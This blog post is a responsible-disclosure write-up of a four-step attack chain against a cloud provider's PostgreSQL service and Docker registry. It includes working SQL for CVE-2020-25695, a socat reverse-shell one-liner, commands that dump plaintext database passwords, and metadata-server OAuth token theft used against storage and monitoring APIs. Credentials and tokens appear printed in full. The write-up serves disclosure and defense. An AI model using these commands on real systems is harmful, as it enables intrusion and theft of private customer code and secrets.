Qi's journal
Exploiting a 27.23 TB Customer Docker Repository of a Cloud Provider
A series of vulnerabilities could have granted attackers access to private customer source code and Docker images in February 2021. The company, which asked to remain anonymous in this report, was notified and rolled out a fix.

Author

Qi Linzhi

Vendor disclosure

Feb 18, 2021

Public disclosure

Dec 1, 2021

The provider is a fully managed cloud hosting platform for web applications, backend services, and databases. The exploit allowed attackers to gain access to Docker images of services hosted by the provider in the United States through a chain of vulnerabilities that began with its managed PostgreSQL databases. The images included source code from private GitHub repositories and production secrets from build processes. Any trial account on the platform without credit cards could have exploited this attack chain, making it difficult to identify the party responsible for a would-have-been data breach.

The provider shipped a same-day patch after my report and commissioned a third-party security group for forensics. The provider found no evidence that this vulnerability had been abused but sent out an advisory recommending that affected users rotate their secrets.

At my request, the provider donated $10,000 to the Electronic Frontier Foundation in place of a bounty. I insisted on making the disclosure public but agreed to the provider’s wish not to be named in the report.

I was on a break after graduating from college and happened to have some time to spare poking around the internet. In what became a cautionary tale about the security of emerging cloud platforms that do not receive enough scrutiny for the amount of critical data they host, I inadvertently assumed the role of a rogue white hat hacker. It keeps me up at night to admit that, in a different world where I were an engineer at a growth-stage cloud platform eager to build new features, I might have overlooked the same vulnerability. Infra is tough.

The attack chain

  1. Start a database instance. Create a deferred constraint trigger that includes a command to elevate user privileges, then wait for autovacuum to execute it as the Postgres superuser. (CVE-2020-25695)
  2. Use COPY FROM PROGRAM to execute arbitrary commands or start a reverse shell on the Kubernetes pod running the database. (CVE-2019-9193; disputed by the community)
  3. Use the Google Cloud Platform (GCP) service account on the pod to obtain an OAuth token from the cluster’s metadata server.
  4. Use the OAuth token with the devstorage.read_only scope to access the GCP storage bucket backing Container Registry through the Cloud Storage API.

Timeline

  • Feb 18, 2021: the provider received and acknowledged my security vulnerability disclosure.
  • Feb 19, 2021: the provider confirmed a fix for the last step of the attack chain and blocked access to the container registry through the service account.
  • Mar 4, 2021: the provider confirmed fixes for all four steps of the attack chain.
  • Sept 28, 2021: the provider received a draft of the public disclosure and provided comments.
  • Oct 29, 2021: the provider’s legal and engineering teams signed off on the content of the public disclosure.

Step 1: Privilege escalation on the PostgreSQL database

Hypothesis

All of the provider’s SQL databases share the same domain, which resolves to a Google Cloud IP address, suggesting at least some of the provider’s services were built on top of Google’s.
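A hunch like this can be checked by comparing the resolved address against published Google Cloud ranges. The following is a minimal sketch, not part of the original investigation: Google publishes its Cloud ranges as JSON at https://www.gstatic.com/ipranges/cloud.json, the key names below reflect my understanding of that file, and the sample prefixes and addresses are placeholder documentation ranges rather than real Google ones.

```python
import ipaddress

def extract_prefixes(ranges_doc):
    """Collect CIDR strings from a document shaped like Google's cloud.json.

    Assumption: each entry carries an "ipv4Prefix" or an "ipv6Prefix" key.
    """
    prefixes = []
    for entry in ranges_doc.get("prefixes", []):
        cidr = entry.get("ipv4Prefix") or entry.get("ipv6Prefix")
        if cidr:
            prefixes.append(cidr)
    return prefixes

def find_matching_prefix(ip, prefixes):
    """Return the first CIDR prefix that contains ip, or None."""
    addr = ipaddress.ip_address(ip)
    for prefix in prefixes:
        network = ipaddress.ip_network(prefix)
        # Only compare addresses and networks of the same IP version.
        if addr.version == network.version and addr in network:
            return prefix
    return None

# Placeholder data (documentation ranges), standing in for the real file.
SAMPLE_DOC = {
    "prefixes": [
        {"ipv4Prefix": "192.0.2.0/24"},
        {"ipv4Prefix": "198.51.100.0/24"},
        {"ipv6Prefix": "2001:db8::/32"},
    ]
}

prefixes = extract_prefixes(SAMPLE_DOC)
print(find_matching_prefix("198.51.100.17", prefixes))  # 198.51.100.0/24
print(find_matching_prefix("203.0.113.5", prefixes))    # None
```

A match only shows that the address sits in a Google-announced range; it says nothing about which Google product is behind it.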

The provider offers database instances with shared CPUs, while GCP’s managed PostgreSQL service Cloud SQL does not. The provider’s PostgreSQL service is likely a custom-built infrastructure running on Kubernetes with Postgres pods sitting behind a load balancer instead of a thin layer on top of Google’s.

The provider lets users choose the name of their Postgres database but sometimes adds a random suffix to the name on creation, presumably to enforce globally unique database names on the platform. This adds to my suspicion that the endpoint points to some load-balancing middleware, like pgpool, routing traffic to a cluster of database pods managed by the provider.

The provider does not offer users a choice of minor PostgreSQL versions. To minimize the risks of migrating customer data, the provider probably does not apply PostgreSQL security updates regularly or automatically on behalf of its users, which means there’s likely a working CVE available for privilege escalation.

Execution

Create a new database on the provider’s portal, with database name db and username user. The DBMS of the instance is PostgreSQL 11.9. Observe the role attributes of database users on the psql console:

db=> \du
                                    List of roles
  Role name  |                         Attributes                         | Member of
-------------+------------------------------------------------------------+-----------
 user        | Create role                                                | {}
 postgres    | Superuser, Create role, Create DB, Replication, Bypass RLS | {}
 primaryuser | Replication                                                | {}
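Whether a reported server version such as 11.9 predates the fix for CVE-2020-25695 can be checked mechanically. The sketch below is an illustration under stated assumptions: the fixed minor releases come from the PostgreSQL security release of November 2020 (13.1, 12.5, 11.10, 10.15), the function name is hypothetical, and the older 9.x branches, which use a three-part version scheme, are left out.

```python
# Minor releases that fixed CVE-2020-25695, keyed by major version.
# 9.6.20 and 9.5.24 also carried the fix but are not handled here.
FIXED_MINOR = {13: 1, 12: 5, 11: 10, 10: 15}

def predates_fix(version):
    """Return True if a 'major.minor' version is older than the fixed minor."""
    major_text, minor_text = version.split(".")[:2]
    major, minor = int(major_text), int(minor_text)
    if major not in FIXED_MINOR:
        raise ValueError(f"major version {major} is not covered by this sketch")
    # Compare numerically: as strings, "11.9" would sort after "11.10".
    return minor < FIXED_MINOR[major]

print(predates_fix("11.9"))   # True
print(predates_fix("11.10"))  # False
```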

CVE-2020-25695

Original GitHub Gist by Etienne Stalmans

Elevate the privilege of our user to superuser. The rest of this step is a minimum reproduction of CVE-2020-25695.

Create a table and an associated index. Per Postgres requirement, functions invoked by indices must be immutable. Let the function return a dummy static value of 0.

CREATE TABLE data (x int);

CREATE OR REPLACE FUNCTION f_index(integer) RETURNS integer
    LANGUAGE sql
    IMMUTABLE AS
'SELECT 0';

CREATE INDEX idx ON data (f_index(x));

Add another query to the function and set it to inherit the caller’s security privileges. The INSERT query implies that the function is volatile and not immutable, but Postgres 11.9 apparently does not complain about this broken invariant. The query creates a dummy row on a new table, invocation. We’ll come back to this table later.

CREATE TABLE invocation (time timestamp);

CREATE OR REPLACE FUNCTION f_index(integer) RETURNS integer
    LANGUAGE sql
    SECURITY INVOKER AS
'
    INSERT INTO db.public.invocation VALUES (now());
    SELECT 0
';

Create the trigger and the privilege escalation function. Ask the postgres superuser nicely to invoke it.

CREATE OR REPLACE FUNCTION f_escalate() RETURNS integer
    LANGUAGE sql
    SECURITY INVOKER AS
'
    DO
    $function$
        BEGIN
            IF current_user = ''postgres'' THEN
                ALTER USER user SUPERUSER;
            END IF;
        END
    $function$;
    SELECT 0;
';

CREATE OR REPLACE FUNCTION f_trigger() RETURNS trigger
AS
$e$
BEGIN
    PERFORM db.public.f_escalate(); RETURN NEW;
END
$e$
    LANGUAGE plpgsql;

Autovacuum runs after deletions from the data table, which has an index that runs a function to insert into the invocation table. We’ll add a trigger on insertions into invocation to run our escalate function. As Stalmans pointed out in the vacuum source code, INITIALLY DEFERRED instructs the trigger to execute at the end of the transaction, after the security context has switched back, which in the case of autovacuum is the superuser postgres.

CREATE CONSTRAINT TRIGGER trig
    AFTER INSERT
    ON invocation
    INITIALLY DEFERRED
    FOR EACH ROW
EXECUTE PROCEDURE f_trigger();

Lower the trigger threshold on the data table and make some dummy transactions to summon autovacuum.

ALTER TABLE data
    SET (autovacuum_vacuum_threshold = 0),
    SET (autovacuum_analyze_threshold = 0);

INSERT INTO data VALUES (1);
DELETE FROM data WHERE true;
INSERT INTO data VALUES (1);
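Why a threshold of zero is enough to summon autovacuum follows from the trigger condition in the PostgreSQL documentation: a table is vacuumed once its obsolete tuples exceed the base threshold plus the scale factor times the table's tuple count. Here is a minimal sketch of that arithmetic, assuming the stock defaults (base threshold 50, scale factor 0.2) and a tuple estimate of 0 for a freshly created table; the function name is hypothetical.

```python
def exceeds_autovacuum_threshold(changed_tuples, reltuples,
                                 base_threshold, scale_factor):
    """Apply the documented rule: changed > base + scale_factor * reltuples."""
    threshold = base_threshold + scale_factor * reltuples
    return changed_tuples > threshold

# One dead tuple left behind by the DELETE; reltuples = 0 is an assumption
# about the planner's estimate for a table that has never been analyzed.
print(exceeds_autovacuum_threshold(1, 0, base_threshold=50, scale_factor=0.2))  # False
print(exceeds_autovacuum_threshold(1, 0, base_threshold=0, scale_factor=0.2))   # True
```

With the default base threshold, a single dead row would not qualify; with the base set to zero on a near-empty table, the scale factor term contributes almost nothing, so one deletion is enough.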

Check whether autovacuum has executed:

SELECT relname, last_autovacuum FROM pg_stat_user_tables WHERE schemaname = 'public';

Observe the role attributes of database users on the psql console:

db=> \du
                                    List of roles
  Role name  |                         Attributes                         | Member of
-------------+------------------------------------------------------------+-----------
 user        | Superuser, Create role                                     | {}
 postgres    | Superuser, Create role, Create DB, Replication, Bypass RLS | {}
 primaryuser | Replication                                                | {}

Side notes

A superuser has the permissions to create new databases. If all databases share the same namespace, it’s possible that a database created by the superuser but not on the provider’s records could mess with backups and the load balancer.

Step 2: Arbitrary command execution with Postgres superuser

CVE-2019-9193

Response by PostgreSQL

With the COPY FROM PROGRAM command, a superuser can execute arbitrary programs on the host shell on behalf of the Unix user running Postgres and pipe stdout to the database. Postgres claims that this is a feature, not a bug.

Where {script} is the shell script to execute:

DROP TABLE IF EXISTS stdout;
CREATE TABLE stdout(line text);
COPY stdout FROM PROGRAM 'bash -c {script}';
SELECT * FROM stdout;
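Substituting {script} by hand is error-prone because the text passes through two layers of quoting: the shell must see the script as a single argument to bash -c, and the whole command must then sit inside a SQL string literal. The following is a rough sketch of that quoting only, assuming standard_conforming_strings is on (the PostgreSQL default); the helper name is hypothetical and the table name is pasted in unquoted.

```python
import shlex

def copy_from_program_statement(script, table="stdout"):
    """Build a COPY ... FROM PROGRAM statement with both quoting layers."""
    # Layer 1: shell quoting, so bash -c receives the script as one argument.
    command = "bash -c " + shlex.quote(script)
    # Layer 2: SQL string literal, where a single quote is escaped by doubling.
    literal = command.replace("'", "''")
    return f"COPY {table} FROM PROGRAM '{literal}';"

statement = copy_from_program_statement("echo 'hello world'")
print(statement)
```

Undoing the SQL doubling and splitting the result with shlex.split should give back exactly three arguments: bash, -c, and the original script.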

We can execute all of steps 3 and 4 through SQL or start an interactive reverse shell with something like:

COPY stdout FROM PROGRAM 'curl https://raw.githubusercontent.com/andrew-d/static-binaries/master/binaries/linux/x86_64/socat > /tmp/socat; chmod +x /tmp/socat; /tmp/socat exec:''bash -li'',pty,stderr,setsid,sigint,sane tcp:{host}:{port}'

On the host system with the IP address {host}:

socat file:`tty`,raw,echo=0 tcp-listen:{port}

Side notes

Credentials for the database users, including the postgres superuser, are stored in plaintext in the filesystem and available as environment variables in the shell. The provider does not restrict logging in with these accounts over the internet. However, this does not pose an imminent security risk since we need Postgres privilege elevation on the database to access these credentials, which are not shared across databases.

$ for f in "/pgprimary" "/pgroot" "/pguser"; do (cat "${f}/username"; echo -n ":"; cat "${f}/password"; echo); done
primaryuser:VeRUoF4RPwOTcaPHH8mSsgyXq5tZNlTr
postgres:bJZM7gORZHkncoyk35KtRAwt77qwqZhf
user:YRtkjYjaE1blwV3KCiSXOuqxcnabYlQq

Step 3: Obtaining OAuth tokens to access GCP resources through the pod service account

Hypothesis

By default, the pod runtime on Google Kubernetes Engine has access to a GCP service account. The pod service account might have unnecessary permissions inherited from the default service account for all VMs since the runtime is not designed for executing untrusted user applications.

Execution

Gathering some information from the metadata server:

$ curl http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/email -H 'Metadata-Flavor:Google'
█████████████████@███████████.iam.gserviceaccount.com

Listing scopes for the service account found:

$ curl http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/scopes -H 'Metadata-Flavor:Google'
https://www.googleapis.com/auth/monitoring
https://www.googleapis.com/auth/devstorage.read_only
https://www.googleapis.com/auth/logging.write
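The same metadata lookups can be expressed in code. The sketch below only builds the request and parses a response body; it never contacts a server, and the helper names are hypothetical. The sample body is the scope listing shown above.

```python
import urllib.request

METADATA_ROOT = "http://metadata.google.internal/computeMetadata/v1/"
SCOPE_PREFIX = "https://www.googleapis.com/auth/"

def metadata_request(path):
    """Build (but do not send) a request carrying the Metadata-Flavor header."""
    return urllib.request.Request(
        METADATA_ROOT + path.lstrip("/"),
        headers={"Metadata-Flavor": "Google"},
    )

def parse_scopes(body):
    """Turn the newline-separated scope listing into short scope names."""
    scopes = []
    for line in body.splitlines():
        line = line.strip()
        if not line:
            continue
        if line.startswith(SCOPE_PREFIX):
            line = line[len(SCOPE_PREFIX):]
        scopes.append(line)
    return scopes

request = metadata_request("instance/service-accounts/default/scopes")
sample_body = (
    "https://www.googleapis.com/auth/monitoring\n"
    "https://www.googleapis.com/auth/devstorage.read_only\n"
    "https://www.googleapis.com/auth/logging.write\n"
)
print(request.full_url)
print(parse_scopes(sample_body))
```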

Let’s try accessing one of these authorized scopes. GKE forbids this with a feature called metadata concealment, which is turned on for the cluster. This prevents access to the instance identity token we need to authenticate as the service account in GCP’s gcloud command line tool.

$ ./gcloud alpha monitoring channels list
ERROR: gcloud crashed (MetadataServerException): The request is rejected. Please check if the metadata server is concealed.

Google Cloud docs

Metadata concealment

The catch is that metadata concealment has a beta SLA and is scheduled to be deprecated. In the docs, Google says “[m]etadata concealment does not restrict access to other legacy metadata APIs”. We can get an access token for the service account from the metadata server through … a REST API. The access token allows us to act on behalf of the service account anywhere inside or outside Google Cloud’s network.

$ curl http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/█████████████████@███████████.iam.gserviceaccount.com/token -H 'Metadata-Flavor:Google'
{"access_token":"ya29.c.KpAB8gfOBB36GONOtRwJXsREgqYBqr-8pXzW4OLN4XXcoIHXMLuWzWjtXPHdeeuGnVqGKxS0Q33H3I2ge-ZtL50VRwFEm2xsvK8zGIoSNhPCqLTJIqjY0Y9LIFG_mJOruPkRWSBM-iVZBdPpeJjTc_fYh9FNcT2swImpImogA8lKwty_7bbD6CQn2b55v8XlhAla","expires_in":3431,"token_type":"Bearer"}
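The response is a small JSON document whose three fields are all that a client needs to build an Authorization header and to know when the token lapses. Here is a minimal sketch of that parsing, using a placeholder token rather than a real one; the function name and the returned dictionary shape are my own choices.

```python
import json
import time

def parse_token_response(body, now=None):
    """Extract the Authorization header value and an absolute expiry time."""
    data = json.loads(body)
    now = time.time() if now is None else now
    return {
        # For example "Bearer <token>", as used in the curl calls.
        "authorization": f"{data['token_type']} {data['access_token']}",
        # expires_in is a lifetime in seconds, counted from the response time.
        "expires_at": now + data["expires_in"],
    }

# Placeholder token, not a real credential.
sample = '{"access_token":"ya29.PLACEHOLDER","expires_in":3431,"token_type":"Bearer"}'
token = parse_token_response(sample, now=1000)
print(token["authorization"])  # Bearer ya29.PLACEHOLDER
print(token["expires_at"])     # 4431
```

An expires_in of 3431 seconds means the token stays valid for a little under an hour after it is issued.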

Side notes

The service account has full access to auth/monitoring, which gives us a view of the provider’s infrastructure health and, more importantly, read and write access to alert policies. These alerts cover node stability, attached volumes, GitHub API limits, credit card declines, and other user abuse indicators, all of which an attacker could disable.

curl "https://monitoring.googleapis.com/v3/projects/███████████/alertPolicies" \
     -H 'Authorization: Bearer ya29.c.KpAB8gfOBB36GONOtRwJXsREgqYBqr-8pXzW4OLN4XXcoIHXMLuWzWjtXPHdeeuGnVqGKxS0Q33H3I2ge-ZtL50VRwFEm2xsvK8zGIoSNhPCqLTJIqjY0Y9LIFG_mJOruPkRWSBM-iVZBdPpeJjTc_fYh9FNcT2swImpImogA8lKwty_7bbD6CQn2b55v8XlhAla'
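From the defender's side, the same listing is a quick way to audit whether any alert has been silently switched off. The sketch below assumes the response carries an "alertPolicies" array whose entries have "displayName" and "enabled" fields, which is my understanding of the Cloud Monitoring v3 API; the policy names in the sample are invented for illustration.

```python
def split_by_enabled(response):
    """Partition alert policy display names into (enabled, not_enabled)."""
    enabled, not_enabled = [], []
    for policy in response.get("alertPolicies", []):
        label = policy.get("displayName") or policy.get("name", "<unnamed>")
        # A missing "enabled" field is treated as not enabled here, so that
        # anything ambiguous gets surfaced for review.
        if policy.get("enabled"):
            enabled.append(label)
        else:
            not_enabled.append(label)
    return enabled, not_enabled

# Hypothetical response body, not taken from the provider.
sample_response = {
    "alertPolicies": [
        {"displayName": "Node not ready", "enabled": True},
        {"displayName": "GitHub API rate limit", "enabled": False},
        {"displayName": "Disk nearly full"},
    ]
}
print(split_by_enabled(sample_response))
```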

The service account can also send messages to the provider’s on-call management tool and to its #critical Slack channel, and it gave me the phone number of the CEO.

Step 4: Accessing the storage bucket for Docker images

Hypothesis

The provider does not allow deployment from Docker images, only building containers from source code. It makes sense to store the containers on the same cloud platform as their runtime. If the provider does not host its own container library, it is probably using a managed solution by GCP.

Execution

The devstorage.read_only scope allows us to list the objects in a bucket given its name but does not include storage.buckets.list, which would have allowed us to list the bucket names associated with the project. Short of brute-forcing names, this limits our access to buckets whose names we already know.

Google Cloud docs

Container Registry IAM

Google Container Registry stores images in two buckets relevant to the provider’s United States region:

  • artifacts.PROJECT-ID.appspot.com
  • us.artifacts.PROJECT-ID.appspot.com

We know the project ID from the service account email address. Fetch the list of artifacts from the REST API:

curl "https://storage.googleapis.com/storage/v1/b/artifacts.███████████.appspot.com/o?project=███████████" \
     -H 'Authorization: Bearer ya29.c.KpAB8gcgbWp2lOeSfsPgZyogWLckVcvFQ2SSgLGvSGNnVQtSIRVgKfTJeRUAol1_atraDDmBBdy-gTjMgpoUVTnztUZtNvsVwUiqa-D4SAlZkpC2wlNG6Vs5uguKVZw8iEb9dwmqJWLljzvQuldOi43YV81lYAY_gUxQClwwltQ0AuNGkYjKXoxhAyxhGZ6s8_gK'
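The path from service account email to bucket URL is plain string manipulation. A minimal sketch follows, assuming a user-managed service account address of the form NAME@PROJECT_ID.iam.gserviceaccount.com; the email and project ID are placeholders, the helper names are hypothetical, and other address formats are deliberately rejected.

```python
SA_SUFFIX = ".iam.gserviceaccount.com"

def project_id_from_email(email):
    """Extract PROJECT_ID from NAME@PROJECT_ID.iam.gserviceaccount.com."""
    domain = email.rsplit("@", 1)[-1]
    if not domain.endswith(SA_SUFFIX):
        raise ValueError("not a user-managed service account address")
    return domain[: -len(SA_SUFFIX)]

def registry_buckets(project_id):
    """Bucket names used by Container Registry for the two hosts above."""
    return [
        f"artifacts.{project_id}.appspot.com",
        f"us.artifacts.{project_id}.appspot.com",
    ]

def list_objects_url(bucket, project_id):
    """Mirror the object-listing URL used in the curl call."""
    return f"https://storage.googleapis.com/storage/v1/b/{bucket}/o?project={project_id}"

# Placeholder address, not the provider's.
project = project_id_from_email("db-runner@example-project.iam.gserviceaccount.com")
for bucket in registry_buckets(project):
    print(list_objects_url(bucket, project))
```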

When I reported the bug, the two buckets contained 822,470 image layers totaling 27.23 TB with no additional object-level ACL.

Layer SHA-256                                                      Modification date      Size (bytes)
------------------------------------------------------------------------------------------------------
0000013103██████████████████████████████████████████████████████   2020-11-23T21:34:01Z   1217978
0000142994██████████████████████████████████████████████████████   2020-05-11T10:03:11Z   14109716
00004e671a██████████████████████████████████████████████████████   2021-01-04T11:38:40Z   1056780
000054208a██████████████████████████████████████████████████████   2020-04-05T02:28:23Z   117
000055e9f6██████████████████████████████████████████████████████   2021-01-06T08:07:45Z   14890
00007f2827██████████████████████████████████████████████████████   2020-08-19T15:51:29Z   6764631
00009fe291██████████████████████████████████████████████████████   2019-07-20T07:08:45Z   325
0000ac0264██████████████████████████████████████████████████████   2018-09-13T00:46:19Z   132983
0000ad26c2██████████████████████████████████████████████████████   2020-10-05T11:44:00Z   1908
0000b06206██████████████████████████████████████████████████████   2020-08-11T22:32:34Z   178601690
....
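Totals like the layer count and overall size can be derived from the listing metadata alone, without downloading any layer. The sketch below assumes each page of the Cloud Storage listing response has an "items" array whose entries report "size" as a decimal string; the object names are placeholders and the three sizes are copied from the first rows of the table above.

```python
def summarize_listing(pages):
    """Return (object_count, total_bytes) across all listing pages."""
    count = 0
    total_bytes = 0
    for page in pages:
        for item in page.get("items", []):
            count += 1
            # The JSON API reports size as a string, so convert before adding.
            total_bytes += int(item["size"])
    return count, total_bytes

# Two hypothetical pages; names are placeholders, sizes come from the table.
sample_pages = [
    {"items": [{"name": "layer-a", "size": "1217978"},
               {"name": "layer-b", "size": "14109716"}]},
    {"items": [{"name": "layer-c", "size": "1056780"}]},
]
count, total = summarize_listing(sample_pages)
print(count, total)  # 3 16384474
```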

The provider’s legal team confirmed that the vulnerability only affected private Dockerfiles potentially embedded with sensitive information over a span of three months. No additional metadata was exposed, so images for specific customers could not be targeted without dumping the entire registry.